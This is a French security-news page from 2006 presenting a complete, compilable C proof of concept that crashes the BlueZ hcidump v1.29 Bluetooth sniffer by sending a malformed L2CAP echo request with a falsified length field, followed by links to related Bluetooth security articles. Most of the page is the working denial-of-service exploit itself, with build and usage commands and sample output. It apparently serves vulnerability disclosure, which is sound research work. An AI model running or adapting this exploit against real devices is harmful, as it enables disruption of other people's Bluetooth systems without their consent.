|
[Infratech - vulnérabilité] PoC pour le DoS sur hcidump
Par Pierre Betouin,
secuobs.com
Le 05/02/2006
Résumé : Code Poc (Proof of Concept) qui permet de démontrer la faisabilité de la faille de type Déni de Service (DoS) sur l'utilitaire hcidump, équivalent bluetooth d'un outil comme tcpdump. - Lire l'article
PoC code could be also downloaded on lien - compilation needs libbluetooth.
/* Bluez hcidump v1.29 DoS - PoC code */
/* Pierre Betouin - pierre.betouin@infratech.fr */
/* 01/18/06 */
/* Vulnerability found using BSS fuzzer : */
/* Download www.secuobs.com/news/05022006-bluetooth10.shtml */
/* Crashes hcidump sending bad L2CAP packet */
/* */
/* gcc -lbluetooth hcidump-crash.c -o hcidump-crash */
/* ./hcidump-crash 00:80:37:XX:XX:XX */
/* L2CAP packet sent (15) */
/* Buffer: 08 01 0C 00 41 41 41 41 41 41 41 41 41 41 41 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>
#define SIZE 15
#define FAKE_SIZE 12
int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;
if(argc < 2)
{
fprintf(stderr, "%s <btaddr>\n", argv[0]);
exit(EXIT_FAILURE);
}
if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
{
perror("socket");
exit(EXIT_FAILURE);
}
memset(&addr, 0, sizeof(addr));
addr.l2_family = AF_BLUETOOTH;
if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("bind");
exit(EXIT_FAILURE);
}
str2ba(argv[1], &addr.l2_bdaddr);
if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("connect");
exit(EXIT_FAILURE);
}
if(!(buffer = (char *) malloc ((int) SIZE + 1)))
{
perror("malloc");
exit(EXIT_FAILURE);
}
memset(buffer, 'A', SIZE);
cmd = (l2cap_cmd_hdr *) buffer;
cmd->code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;
if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf("L2CAP packet sent (%d)\n", sent);
}
printf("Buffer:\t");
for(i=0; i<sent; i++)
printf("%.2X ", (unsigned char) buffer[i]);
printf("\n");
free(buffer);
close(sock);
return EXIT_SUCCESS;
}
Ce code peut être également téléchargé sur lien - la compilation a besoin de la libbluetooth.
Autres ressources sur la sécurité Bluetooth :
[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien
[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaies Bluetooth lien
[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien
[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien
[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien
[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones Sony/Ericsson lien
[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien
[Infratech - vulnérabilité] Déni de Service sur hcidump lien
[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien
- Article suivant : [Infratech - vulnérabilité] Déni de Service sur hcidump
- Article précédent : [Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur hcidump
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson
Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|